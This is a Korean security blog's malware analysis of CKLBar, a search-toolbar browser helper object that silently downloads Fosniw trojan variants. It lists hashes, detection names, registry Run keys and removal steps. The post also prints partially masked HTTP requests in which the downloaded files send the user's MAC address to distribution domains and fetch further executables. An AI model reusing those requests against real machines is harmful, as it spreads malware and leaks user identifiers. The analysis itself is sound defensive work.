본문 바로가기

벌새::Analysis

국내 악성코드 : CKLBar

국내에서 제작되어 프로그램이 설치된 환경에서 사용자 키워드 감시를 통해 관련 추천 사이트 정보를 웹 브라우저 상단바 형태로 출력하는 것으로 알려진 검색 도우미 CKLBar 프로그램에 대해 살펴보도록 하겠습니다.

해당 프로그램이 설치된 환경에서의 기본적인 동작 방식은 CherryLove님 분석글을 참고하시기 바라며, 최근 설치 파일이 변경되면서 추가적으로 사용자 몰래 국내에서 악성 프로그램 유포와 관련된  도메인을 통해 추가적인 파일을 다운로드하는 동작을 추가로 확인하였습니다.

해당 프로그램의 설치 파일(MD5 : eb16c1fa23d451b2c19eccae8d96cf9d)에 대하여 Kaspersky 보안 제품에서는 Trojan-Downloader.Win32.Genome.axvl (VirusTotal : 6/43) 진단명으로 진단되고 있으므로 참고하시기 바랍니다.

[CKLBar 프로그램 생성 폴더, 파일 등록 정보]

C:\Program Files\cklbar\cklbar.dll : BHO 등록 파일
C:\Program Files\cklbar\Uninstall.exe : 프로그램 삭제 파일

[생성 레지스트리 등록 정보]

HKEY_CLASSES_ROOT\AppID\cklbar.DLL
HKEY_CLASSES_ROOT\AppID\{E7A61C08-30B9-4DD8-A190-719E1707E2B9}
HKEY_CLASSES_ROOT\cklbar.cklbar
HKEY_CLASSES_ROOT\cklbar.cklbar.1
HKEY_CLASSES_ROOT\CLSID\{CAD9DDDF-0D71-4162-BF51-CF99B8D3496B}
HKEY_CLASSES_ROOT\Interface\{F493AE44-7D76-4F42-8E7A-222149EC492C}
HKEY_CLASSES_ROOT\TypeLib\{E1DC50EB-E932-41E7-B3E3-4F438E2F28AC}
HKEY_LOCAL_MACHINE\software\cklbar
HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Explorer\
Browser Helper Objects\{CAD9DDDF-0D71-4162-BF51-CF99B8D3496B}

HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Uninstall\cklbar

해당 프로그램이 설치된 환경에서는 Internet Explorer 동작시 cklbar.dll 파일이 iexplore.exe 프로세스에 BHO 방식으로 추가되어 동작하는 방식이므로 일반 사용자들은 인지하기 매우 어렵습니다.

[추가 기능 관리 : 도구 모음 및 확장 프로그램]

cklbar Class
 - 게시자 : 알 수 없음
 - CLSID : {CAD9DDDF-0D71-4162-BF51-CF99B8D3496B}
 - 파일 : C:\Program Files\cklbar\cklbar.dll

이렇게 설치된 CKLBar 프로그램은 사용자가 웹 브라우저를 통해 인터넷을 하는 과정에서 일정 시간이 경과하면 추가적으로 다음과 같은 파일을 사용자 몰래 설치하는 동작을 확인할 수 있습니다.

[추가 다운로드 예시]

C:\Documents and Settings\(사용자 계정)\rjco.exe (MD5 : ee15be08a79c7d22359916bbfcd9802a)
 - Microsoft : TrojanDownloader:Win32/Fosniw.A (VirusTotal : 11/43)

C:\Documents and Settings\(사용자 계정)\ytgw.exe (MD5 : e3021fafc58632abfdf7b1951eca8a04)
 - Hauri ViRobot : Trojan.Win32.Fosniw.79872.S (VirusTotal : 12/42)

C:\Documents and Settings\(사용자 계정)\whql.exe (MD5 : eeafd879c50d2874d94ca4c0f44ccbaf)
 - AVG : Agent2.BMMO (VirusTotal : 11/43)

즉, [C:\Documents and Settings\(사용자 계정)] 폴더 내에 Trojan.Win32.Fosniw 변종으로 진단되는 임의의 4자리 영문으로 구성된 실행 파일을 다운로드를 시도하며 해당 파일은 다음과 같은 연결을 시도하고 있습니다.

[(Random 4자리 영문).exe 파일 네트워크 연결 정보]

GET h**p://p.***soft1.com/receive/r_autoidcnt.asp?mer_seq=0&realid=home&cnt_type=r&mac=(사용자 Mac Address)&idt=00000000000 HTTP/1.1
Host: p.***soft1.com

GET h**p://***soft1.com/app.asp?prj=0&pid=home&mac=(사용자 Mac Address)&idt=00000000000&logdata=MacTryCnt:0&code=&ver=1.0.0.3 HTTP/1.1
Host: ***soft1.com
 -> h**p://down.***wordkr.com/setup/k001_kkr/setup.exe

즉, 국내 악성 프로그램 유포 도메인으로 유명한 ***soft1.com에 접속을 시도하여 최종적으로 setup.exe 파일을 다운로드를 시도하고 있습니다.

[setup.exe 파일 다운로드 예시]

C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\setup.exe (MD5 : b389b9b48849cc38898e001d5702c8a6)
 - avast! : Win32:Fosniw-B (VirusTotal : 12/43)

C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\setup.exe (MD5 : 271f39c034f134c92e46a9da8be48d88)
 - Kaspersky : P2P-Worm.Win32.Palevo.awhs (VirusTotal : 1/43)

C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\setup.exe (MD5 : 9be5d6e3c8e622642252e787a652d080)

C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\setup.exe (MD5 : 465cc97bb29af68221cc104c44162b94)

다운로드된 setup.exe 파일은 [C:\Documents and Settings\(사용자 계정)\Local Settings\Temp] 폴더 내에 파일을 생성하며 다음과 같은 연결을 시도하고 있습니다.

[setup.exe 파일 네트워크 연결 정보]

GET h**p://p.***wordkr.com/receive/r_autoidcnt.asp?mer_seq=1&realid=kkr&cnt_type=e1&mac=(사용자 계정)&logdata=MacTryCnt:0 HTTP/1.1
Host: p.***wordkr.com

GET h**p://***soft1.com/setup.asp?prj=2&pid=cwn1&mac=(사용자 Mac Address) HTTP/1.1
Host: ***soft1.com
 -> h**p://down.***soft1.com/down/1/(Random 4자리 영문).exe
 -> h**p://down.***soft1.com/down/2/(Random 4자리 영문).exe
 -> h**p://down.***soft1.com/down/3/(Random 4자리 영문).exe

이렇게 사용자 몰래 설치된 프로그램은 [C:\Documents and Settings\(사용자 계정)] 폴더 내에 생성된 임의의 4자리 영문 실행 파일을 시작 프로그램으로 등록하여 Windows 시작시 자동으로 실행되도록 구성되어 있습니다.

[사용자 몰래 추가된 프로그램이 생성한 레지스트리 등록 정보 예시]

HKEY_CURRENT_USER\Software\(Random 영문+숫자)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 - a4bcb5b9f8b3aeb3 = C:\Documents and Settings\(사용자 계정)\rjco.exe
 - afa2b1a1f8b3aeb3 = C:\Documents and Settings\(사용자 계정)\ytgw.exe
 - a1bea7baf8b3aeb3 = C:\Documents and Settings\(사용자 계정)\whql.exe
 - b9b9a0b0aab6b6fcb7aab7 = C:\Documents and Settings\(사용자 계정)\Application Data\bxdd.exe
 - b9b9a0baa3b7bffcb7aab7 = C:\Documents and Settings\(사용자 계정)\Application Data\hqem.exe

해당 파일 및 레지스트리 등록 정보는 사용자가 설치하는 시점마다 변경되는 방식이므로 기본적인 구조를 예시로 들었으므로 참고하시기 바랍니다.

실제 추가된 프로그램이 어떤 동작을 하는지는 현재 확인이 되지 않지만, 이런 방식으로 사용자 컴퓨터에 설치되는 구조는 차후 악성코드 배포자가 사용자 몰래 프로그램 설치를 용이하게 할 수 있는 환경을 제공하므로 사용자들은 1차적으로 CKLBar 프로그램 제거 및 사용자 몰래 설치된 파일 제거를 하시길 바랍니다.


CKLBar 프로그램 삭제시에는 모든 Internet Explorer를 종료한 후, 제어판의 [cklbar] 삭제 항목을 이용하여 삭제하실 수 있습니다.


또는 실행창에 [C:\Program Files\cklbar\Uninstall.exe C:\Program Files\cklbar] 명령어를 이용하여 프로그램 삭제를 하실 수 있습니다.

이처럼 정상적인 검색 도우미 프로그램으로 위장하여 사용자 컴퓨터에 설치된 후, 사용자 몰래 추가적인 악성 파일을 다운로드할 수 있으므로 검증되지 않은 프로그램은 설치하지 않도록 주의하시기 바랍니다.